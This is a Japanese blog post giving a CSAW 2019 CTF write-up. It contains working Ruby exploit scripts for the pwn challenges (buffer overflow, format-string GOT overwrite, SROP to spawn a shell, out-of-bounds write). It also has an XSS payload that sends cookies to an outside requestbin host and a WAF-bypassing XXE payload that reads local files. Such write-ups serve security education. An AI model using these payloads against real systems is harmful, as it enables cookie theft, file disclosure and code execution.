






<!DOCTYPE html>
<html lang="en-us">
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>
    
    Csaw2019 writeup | $ make life
    
  </title>
  
  
  <link rel="stylesheet" href="https://owlinux1000.github.io/blog/css/base.min.21688b64210142c045c9a1d930a48fc517f428060c78a3a012d71f971874c5c3.css" integrity="sha256-IWiLZCEBQsBFyaHZMKSPxRf0KAYMeKOgEtcflxh0xcM=">
  
  <meta name="generator" content="Hugo 0.53" />
</head>
<body>
  <nav class="u-background">
  <div class="u-wrapper">
    <ul class="Banner">
      <li class="Banner-item Banner-item--title">
        <a class="Banner-link u-clickable" href="https://owlinux1000.github.io/blog/">$ make life</a>
      </li>
      
      <li class="Banner-item">
        <a class="Banner-link u-clickable" href="https://owlinux1000.github.io/blog/about/">About</a>
      </li>
      
      <li class="Banner-item">
        <a class="Banner-link u-clickable" href="https://owlinux1000.github.io/blog/post/">Posts</a>
      </li>
      
      <li class="Banner-item">
        <a class="Banner-link u-clickable" href="https://owlinux1000.github.io/blog/tags/">Tags</a>
      </li>
      
      <li class="Banner-item">
        <a class="Banner-link u-clickable" href="https://owlinux1000.github.io/blog/categories/">Categories</a>
      </li>
      
      <li class="Banner-item">
        <a class="Banner-link u-clickable" href="https://owlinux1000.github.io/blog/index.xml">RSS</a>
      </li>
      
    </ul>
  </div>
</nav>
  <main>
    <div class="u-wrapper">
      <div class="u-padding">
        

<article>
  <header class="Heading">
  <h2 class="Heading-title">
    <a class="Heading-link u-clickable" href="https://owlinux1000.github.io/blog/post/csaw2019/" rel="bookmark">Csaw2019 writeup</a>
  </h2>
  
  <time datetime="2019-09-16T09:50:28&#43;09:00">
    16 September, 2019
  </time>
  
</header>
  

<h2 id="misc">Misc</h2>

<h3 id="mcgriddlev2">mcgriddlev2</h3>

<ul>
<li>問題文にFLAGが記載されている</li>
<li><strong>flag{W3lcome_7o_CSAW_QUALS_2019!}</strong></li>
</ul>

<h2 id="pwn">Pwn</h2>

<h3 id="baby-boi-50pt">baby_boi (50pt)</h3>

<ul>
<li>シンプルなBOFでIPが奪える問題</li>

<li><p>libcのアドレスを出力してくれているので、配布されたlibcでオフセット求めてOne-Gadget に飛ばしてシェルを奪う</p>
<div class="highlight"><pre style=";-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-ruby" data-lang="ruby"><span style="color:#408080;font-style:italic">#!/usr/bin/env ruby</span>
<span style="color:#408080;font-style:italic"># coding: ascii-8bit</span>
<span style="color:#008000">require</span> <span style="color:#ba2121">&#39;pwn&#39;</span>
$z <span style="color:#666">=</span> <span style="color:#800">Sock</span><span style="color:#666">.</span>new <span style="color:#ba2121">&#34;localhost&#34;</span>, <span style="color:#666">8888</span>
$z <span style="color:#666">=</span> <span style="color:#800">Sock</span><span style="color:#666">.</span>new <span style="color:#ba2121">&#34;pwn.chal.csaw.io&#34;</span>, <span style="color:#666">1005</span>
libc <span style="color:#666">=</span> <span style="color:#800">ELF</span><span style="color:#666">.</span>new <span style="color:#ba2121">&#34;./libc-2.27.so&#34;</span>
<span style="color:#408080;font-style:italic">#libc = ELF.new &#34;/lib/x86_64-linux-gnu/libc-2.29.so&#34;</span>
<span style="color:#008000;font-weight:bold">def</span> <span style="color:#00f">z</span>; $z; <span style="color:#008000;font-weight:bold">end</span>
z<span style="color:#666">.</span>recvuntil(<span style="color:#ba2121">&#34;</span><span style="color:#b62;font-weight:bold">\n</span><span style="color:#ba2121">&#34;</span>)
libc_printf <span style="color:#666">=</span> z<span style="color:#666">.</span>recvuntil(<span style="color:#ba2121">&#34;</span><span style="color:#b62;font-weight:bold">\n</span><span style="color:#ba2121">&#34;</span>)<span style="color:#666">.</span>match(<span style="color:#b68">/: (.+)/</span>)<span style="color:#666">[</span><span style="color:#666">1</span><span style="color:#666">].</span>to_i(<span style="color:#666">16</span>)
libc_base <span style="color:#666">=</span> libc_printf <span style="color:#666">-</span> libc<span style="color:#666">.</span>symbols<span style="color:#666">[</span><span style="color:#ba2121">&#34;printf&#34;</span><span style="color:#666">]</span>
<span style="color:#008000">puts</span> <span style="color:#ba2121">&#34;%x&#34;</span> <span style="color:#008000">% libc_base
</span><span style="color:#008000">payload </span> <span style="color:#666">=</span> <span style="color:#ba2121">&#34;A&#34;</span> <span style="color:#666">*</span> <span style="color:#666">40</span>
payload <span style="color:#666">&lt;&lt;</span> p64(libc_base <span style="color:#666">+</span> <span style="color:#666">0x4f322</span>)
z<span style="color:#666">.</span>sendline(payload)
z<span style="color:#666">.</span>interact</code></pre></div></li>

<li><p><strong>flag{baby_boi_dodooo_doo_doo_dooo}</strong></p></li>
</ul>

<h3 id="got-milk-50pt">GOT Milk? (50pt)</h3>

<ul>
<li>独自の共有オブジェクトとバイナリが配られる</li>
<li><code>set LD_LIBRARY_PATH ./</code> でカレントディレクトリの共有オブジェクトを見るようにする</li>

<li><p>FSBがあるので、それを使ってGOT Overwriteする</p>
<div class="highlight"><pre style=";-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-ruby" data-lang="ruby"><span style="color:#408080;font-style:italic">#!/usr/bin/env ruby</span>
<span style="color:#408080;font-style:italic"># coding: ascii-8bit</span>
<span style="color:#008000">require</span> <span style="color:#ba2121">&#39;pwn&#39;</span>
<span style="color:#008000">require</span> <span style="color:#ba2121">&#39;fsa&#39;</span>
<span style="color:#408080;font-style:italic">#$z = Sock.new &#34;localhost&#34;, 8888</span>
$z <span style="color:#666">=</span> <span style="color:#800">Sock</span><span style="color:#666">.</span>new <span style="color:#ba2121">&#34;pwn.chal.csaw.io&#34;</span>, <span style="color:#666">1004</span>
<span style="color:#008000;font-weight:bold">def</span> <span style="color:#00f">z</span>; $z; <span style="color:#008000;font-weight:bold">end</span>
value <span style="color:#666">=</span> <span style="color:#666">0x89</span>
fmt <span style="color:#666">=</span> <span style="color:#800">FSA</span><span style="color:#666">.</span>new()
fmt<span style="color:#666">[</span><span style="color:#666">0x804a010</span><span style="color:#666">]</span> <span style="color:#666">=</span> value
payload <span style="color:#666">=</span> fmt<span style="color:#666">.</span>payload(<span style="color:#666">7</span>) <span style="color:#408080;font-style:italic"># index of argument</span>
<span style="color:#008000">puts</span> z<span style="color:#666">.</span>recvuntil(<span style="color:#ba2121">&#34;? &#34;</span>)
z<span style="color:#666">.</span>sendline(payload)
<span style="color:#008000">puts</span> z<span style="color:#666">.</span>recv</code></pre></div></li>

<li><p><strong>flag{y0u_g00000t_mi1k_4_M3!?}</strong></p></li>
</ul>

<h3 id="small-boi-100pt">small_boi (100pt)</h3>

<ul>
<li>statically linked でstrippedな小さなバイナリが与えられる</li>

<li><p>sig_return システムコールを呼ぶようなraxの設定のされ方があるのと自明なBOFがあるので、Sigreturn ROP (SROP) で <code>execve(&quot;/bin/sh&quot;, 0, 0)</code> を実行する</p>

<ul>
<li>SROPは、スタックの値を使ってsig_return実行時にレジスタの値を代入する攻撃</li>

<li><p>これを使ってrdiやrsi、ripなどが設定できるため任意のシステムコールを呼べる</p>
<div class="highlight"><pre style=";-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-ruby" data-lang="ruby"><span style="color:#408080;font-style:italic">#!/usr/bin/env ruby</span>
<span style="color:#408080;font-style:italic"># coding: ascii-8bit</span>
<span style="color:#008000">require</span> <span style="color:#ba2121">&#39;pwn&#39;</span>
<span style="color:#408080;font-style:italic">#$z = Sock.new &#34;localhost&#34;, 8888</span>
$z <span style="color:#666">=</span> <span style="color:#800">Sock</span><span style="color:#666">.</span>new <span style="color:#ba2121">&#34;pwn.chal.csaw.io&#34;</span>, <span style="color:#666">1002</span>
<span style="color:#008000;font-weight:bold">def</span> <span style="color:#00f">z</span>; $z; <span style="color:#008000;font-weight:bold">end</span>
payload <span style="color:#666">=</span> <span style="color:#ba2121">&#34;</span><span style="color:#b62;font-weight:bold">\x00</span><span style="color:#ba2121">&#34;</span> <span style="color:#666">*</span> <span style="color:#666">0x28</span>
payload <span style="color:#666">&lt;&lt;</span> p64(<span style="color:#666">0x40017c</span>)
payload <span style="color:#666">&lt;&lt;</span> p64(<span style="color:#666">0x0</span>) <span style="color:#666">*</span> <span style="color:#666">4</span>
payload <span style="color:#666">&lt;&lt;</span> p64(<span style="color:#666">0x0</span>) <span style="color:#666">*</span> <span style="color:#666">8</span> <span style="color:#408080;font-style:italic"># r8~r15</span>
payload <span style="color:#666">&lt;&lt;</span> p64(<span style="color:#666">0x4001ca</span>) <span style="color:#408080;font-style:italic"># rdi = /bin/sh</span>
payload <span style="color:#666">&lt;&lt;</span> p64(<span style="color:#666">0</span>) <span style="color:#408080;font-style:italic"># rsi</span>
payload <span style="color:#666">&lt;&lt;</span> p64(<span style="color:#666">0</span>) <span style="color:#408080;font-style:italic"># rbp</span>
payload <span style="color:#666">&lt;&lt;</span> p64(<span style="color:#666">0</span>) <span style="color:#408080;font-style:italic"># </span>
payload <span style="color:#666">&lt;&lt;</span> p64(<span style="color:#666">0</span>) <span style="color:#408080;font-style:italic"># </span>
payload <span style="color:#666">&lt;&lt;</span> p64(<span style="color:#666">0x3b</span>) <span style="color:#408080;font-style:italic"># rax = 0x3b </span>
payload <span style="color:#666">&lt;&lt;</span> p64(<span style="color:#666">0</span>) <span style="color:#408080;font-style:italic"># rcx</span>
payload <span style="color:#666">&lt;&lt;</span> p64(<span style="color:#666">0</span>)   <span style="color:#408080;font-style:italic"># rsp</span>
payload <span style="color:#666">&lt;&lt;</span> p64(<span style="color:#666">0x00400185</span>) <span style="color:#408080;font-style:italic"># rip = syscall</span>
payload <span style="color:#666">&lt;&lt;</span> p64(<span style="color:#666">0x0</span>) <span style="color:#408080;font-style:italic"># eflags</span>
payload <span style="color:#666">&lt;&lt;</span> p16(<span style="color:#666">0x33</span>) <span style="color:#408080;font-style:italic"># cs</span>
payload <span style="color:#666">&lt;&lt;</span> p16(<span style="color:#666">0</span>)
payload <span style="color:#666">&lt;&lt;</span> p16(<span style="color:#666">0</span>)
payload <span style="color:#666">&lt;&lt;</span> p16(<span style="color:#666">0x2b</span>) <span style="color:#408080;font-style:italic"># ss</span>
payload <span style="color:#666">&lt;&lt;</span> p64(<span style="color:#666">0x0</span>) <span style="color:#666">*</span> <span style="color:#666">5</span> <span style="color:#408080;font-style:italic"># err ~ union</span>
payload <span style="color:#666">&lt;&lt;</span> p64(<span style="color:#666">0x0</span>) <span style="color:#666">*</span> <span style="color:#666">8</span> <span style="color:#408080;font-style:italic"># reserved[8]</span>
z<span style="color:#666">.</span>sendline payload
z<span style="color:#666">.</span>interact</code></pre></div></li>
</ul></li>

<li><p><strong>flag{sigrop_pop_pop_pop}</strong></p></li>
</ul>

<h3 id="traveller">traveller</h3>

<ul>
<li>解けなかったのでwriteupを見た</li>
<li>Off-by-oneがあるためHeap問題かと思ったら操作対象のインデックスの入力に負数が入力できるOOB問題</li>

<li><p>編集コマンドで、<code>-50</code> をするとfree@gotを書き換えられたのでこれを使って<code>cat_flag</code>関数に飛ばす</p>
<div class="highlight"><pre style=";-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-ruby" data-lang="ruby"><span style="color:#408080;font-style:italic">#!/usr/bin/env ruby</span>
<span style="color:#408080;font-style:italic"># coding: ascii-8bit</span>
<span style="color:#008000">require</span> <span style="color:#ba2121">&#39;pwn&#39;</span>
$z <span style="color:#666">=</span> <span style="color:#800">Sock</span><span style="color:#666">.</span>new <span style="color:#ba2121">&#34;pwn.chal.csaw.io&#34;</span>, <span style="color:#666">1003</span>
<span style="color:#408080;font-style:italic">#elf = ELF.new &#34;./traveller&#34;</span>
<span style="color:#408080;font-style:italic">#libc = ELF.new &#34;./libc-2.23.so&#34;</span>
context<span style="color:#666">.</span>log_level <span style="color:#666">=</span> <span style="color:#19177c">:debug</span>
<span style="color:#008000;font-weight:bold">def</span> <span style="color:#00f">z</span>; $z; <span style="color:#008000;font-weight:bold">end</span>
<span style="color:#008000;font-weight:bold">def</span> <span style="color:#00f">add</span>(dist, dest)
z<span style="color:#666">.</span>sendline <span style="color:#ba2121">&#34;1&#34;</span>
z<span style="color:#666">.</span>recvuntil <span style="color:#ba2121">&#34;&gt; &#34;</span>
z<span style="color:#666">.</span>sendline dist<span style="color:#666">.</span>to_s
z<span style="color:#666">.</span>recvuntil <span style="color:#ba2121">&#34;: &#34;</span>
z<span style="color:#666">.</span>sendline dest
z<span style="color:#666">.</span>recvuntil <span style="color:#ba2121">&#34;&gt; &#34;</span>
<span style="color:#008000;font-weight:bold">end</span>
<span style="color:#008000;font-weight:bold">def</span> <span style="color:#00f">change</span>(dist, dest)
z<span style="color:#666">.</span>sendline <span style="color:#ba2121">&#34;2&#34;</span>
z<span style="color:#666">.</span>recvuntil <span style="color:#ba2121">&#34;: &#34;</span>
z<span style="color:#666">.</span>sendline dist<span style="color:#666">.</span>to_s
z<span style="color:#666">.</span>send dest
z<span style="color:#666">.</span>recvuntil <span style="color:#ba2121">&#34;&gt; &#34;</span>
<span style="color:#008000;font-weight:bold">end</span>
<span style="color:#008000;font-weight:bold">def</span> <span style="color:#00f">delete</span>(dist)
z<span style="color:#666">.</span>sendline <span style="color:#ba2121">&#34;3&#34;</span>
z<span style="color:#666">.</span>recvuntil <span style="color:#ba2121">&#34;: &#34;</span>
z<span style="color:#666">.</span>sendline dist<span style="color:#666">.</span>to_s
z<span style="color:#666">.</span>recvuntil <span style="color:#ba2121">&#34;&gt; &#34;</span>
<span style="color:#008000;font-weight:bold">end</span>
<span style="color:#008000;font-weight:bold">def</span> <span style="color:#00f">check</span>(dist)
z<span style="color:#666">.</span>sendline <span style="color:#ba2121">&#34;4&#34;</span>
z<span style="color:#666">.</span>recvuntil <span style="color:#ba2121">&#34;&gt;&#34;</span>
z<span style="color:#666">.</span>sendline dist<span style="color:#666">.</span>to_s
<span style="color:#008000;font-weight:bold">return</span> z<span style="color:#666">.</span>recvuntil <span style="color:#ba2121">&#34;&gt; &#34;</span>
<span style="color:#008000;font-weight:bold">end</span>
tmp <span style="color:#666">=</span> z<span style="color:#666">.</span>recvuntil <span style="color:#ba2121">&#34;&gt; &#34;</span>
stack_address <span style="color:#666">=</span> tmp<span style="color:#666">.</span>match(<span style="color:#b68">/.\n(.*) \n\n/</span>)<span style="color:#666">[</span><span style="color:#666">1</span><span style="color:#666">].</span>to_i(<span style="color:#666">16</span>)
add(<span style="color:#666">1</span>, <span style="color:#ba2121">&#34;AAAAAAAA&#34;</span>)
change(<span style="color:#666">-</span><span style="color:#666">50</span>, p64(<span style="color:#666">0x4008b6</span>))
<span style="color:#008000">puts</span> delete(<span style="color:#666">0</span>)</code></pre></div></li>

<li><p><strong>flag{h0pe_y0u_3nj0y_ur_j0urn3y}</strong></p></li>
</ul>

<h2 id="rev">Rev</h2>

<h3 id="beleaf">Beleaf</h3>

<ul>
<li>バイナリ中にFLAGに使われる文字列とインデックスの配列があるので、それを引っこ抜いてきて実行する</li>
</ul>
<div class="highlight"><pre style=";-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-ruby" data-lang="ruby"><span style="color:#408080;font-style:italic">#!/usr/bin/env ruby</span>

idxs <span style="color:#666">=</span> <span style="color:#666">[</span><span style="color:#666">0x1</span>, <span style="color:#666">0x9</span>, <span style="color:#666">0x11</span>, <span style="color:#666">0x27</span>, <span style="color:#666">0x02</span>, <span style="color:#666">0x00</span>, <span style="color:#666">0x12</span>, <span style="color:#666">0x03</span>, <span style="color:#666">0x8</span>, <span style="color:#666">0x12</span>, <span style="color:#666">0x9</span>, <span style="color:#666">0x12</span>, <span style="color:#666">0x11</span>, <span style="color:#666">0x1</span>, <span style="color:#666">0x3</span>, <span style="color:#666">0x13</span>, <span style="color:#666">0x4</span>, <span style="color:#666">0x3</span>, <span style="color:#666">0x5</span>, <span style="color:#666">0x15</span>, <span style="color:#666">0x2e</span>, <span style="color:#666">0xa</span>, <span style="color:#666">0x3</span>, <span style="color:#666">0xa</span>, <span style="color:#666">0x12</span>, <span style="color:#666">0x3</span>, <span style="color:#666">0x1</span>, <span style="color:#666">0x2e</span>, <span style="color:#666">0x16</span>, <span style="color:#666">0x2e</span>, <span style="color:#666">0xa</span>, <span style="color:#666">0x12</span>, <span style="color:#666">0x6</span><span style="color:#666">]</span>

flag <span style="color:#666">=</span> <span style="color:#666">[</span><span style="color:#666">0x77</span>, <span style="color:#666">0x66</span>, <span style="color:#666">0x7b</span>, <span style="color:#666">0x5f</span>, <span style="color:#666">0x6e</span>, <span style="color:#666">0x79</span>, <span style="color:#666">0x7d</span>, <span style="color:#666">0x20</span>, <span style="color:#666">0x62</span>, <span style="color:#666">0x6c</span>, <span style="color:#666">0x72</span>, <span style="color:#666">0x20</span>, <span style="color:#666">0x20</span>, <span style="color:#666">0x20</span>, <span style="color:#666">0x20</span>, <span style="color:#666">0x20</span>, <span style="color:#666">0x20</span>, <span style="color:#666">0x61</span>, <span style="color:#666">0x65</span>, <span style="color:#666">0x69</span>, <span style="color:#666">0x20</span>, <span style="color:#666">0x6f</span>, <span style="color:#666">0x74</span>, <span style="color:#666">0x20</span>, <span style="color:#666">0x20</span>, <span style="color:#666">0x20</span>, <span style="color:#666">0x20</span>, <span style="color:#666">0x20</span>, <span style="color:#666">0x20</span>, <span style="color:#666">0x20</span>, <span style="color:#666">0x20</span>, <span style="color:#666">0x20</span>, <span style="color:#666">0x20</span>, <span style="color:#666">0x20</span>, <span style="color:#666">0x20</span>, <span style="color:#666">0x20</span>, <span style="color:#666">0x20</span>, <span style="color:#666">0x20</span>, <span style="color:#666">0x20</span>, <span style="color:#666">0x67</span>, <span style="color:#666">0x20</span>, <span style="color:#666">0x20</span>, <span style="color:#666">0x20</span>, <span style="color:#666">0x20</span>, <span style="color:#666">0x20</span>, <span style="color:#666">0x20</span>, <span style="color:#666">0x75</span><span style="color:#666">].</span>map(<span style="color:#666">&amp;</span><span style="color:#19177c">:chr</span>)

idxs<span style="color:#666">.</span>each <span style="color:#008000;font-weight:bold">do</span> <span style="color:#666">|</span>i<span style="color:#666">|</span>
  <span style="color:#008000">print</span> flag<span style="color:#666">[</span>i<span style="color:#666">]</span>
<span style="color:#008000;font-weight:bold">end</span></code></pre></div>
<ul>
<li><strong>flag{we_beleaf_in_your_re_future}</strong></li>
</ul>

<h2 id="web">Web</h2>

<h3 id="baby-csp">baby csp</h3>

<ul>
<li>CSPが有効なXSS問題

<ul>
<li><code>default-src 'self'; script-src 'self' *.google.com; connect-src *</code></li>
</ul></li>
<li>上記のCSPからJSONPエンドポイントでのXSSを使う

<ul>
<li><a href="https://inside.pixiv.blog/kobo/5137">https://inside.pixiv.blog/kobo/5137</a></li>
</ul></li>
<li>FLAGは、Cookieにあるので、requestbin を使ってPOSTさせるJavaScriptを埋め込む</li>
<li><code>&lt;script src=&quot;https://accounts.google.com/o/oauth2/revoke?callback=navigator.sendBeacon('http://requestbin.net/r/ugix54ug', document.cookie)&quot;&gt;&lt;/script&gt;</code></li>
<li><strong>flag{csp_will_solve_EVERYTHING}</strong></li>
</ul>

<h3 id="unagi">unagi</h3>

<ul>
<li>解けなかったのでwriteupを見た</li>
<li>XMLがアップロードできるので、XXEだとわかるが、WAFがありいくつかのキーワード(ENTITYやSYSTEMなど)が使えない

<ul>
<li>PUBLIC は使えたりした</li>
</ul></li>
<li>結論としては、UTF-8ではなくUTF-16BEでアップロードすればWAFをBypassできるというものだった

<ul>
<li>試してたが、普通にXXEとしてうまくないファイルだったためこの方針を諦めてしまっていたのが解けない原因っぽい</li>
</ul></li>
<li><code>cat x.xml | iconv -f UTF-8 -t UTF-16BE &gt; x_utf-16.xml</code> などで作成してアップロードする
<code>xml
&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE root[
&lt;!ENTITY pass SYSTEM &quot;file:///flag.txt&quot;&gt;
]&gt;
&lt;users&gt;
&lt;user&gt;
&lt;username&gt;alice2&lt;/username&gt;
&lt;password&gt;passwd1&lt;/password&gt;
&lt;name&gt;Alice2&lt;/name&gt;
&lt;email&gt;alice2@fakesite.com&lt;/email&gt;
&lt;group&gt;CSAW2019&lt;/group&gt;
&lt;intro&gt;&amp;pass;&lt;/intro&gt;
&lt;/user&gt;
&lt;/users&gt;
</code></li>
<li><strong>flag{n0w_i&rsquo;m_s@d_cuz_y0u_g3t_th3_fl4g_but_c0ngr4ts}</strong></li>
</ul>

  
</article>


      </div>
    </div>
  </main>
  
<footer class="Footer">
  <div class="u-wrapper">
    <div class="u-padding">
      Except where otherwise noted, content on this site is licensed under a <a href="http://creativecommons.org/licenses/by/4.0/" rel="license"> Creative Commons Attribution 4.0 International License</a>.
    </div>
  </div>
</footer>

  
</body>
</html>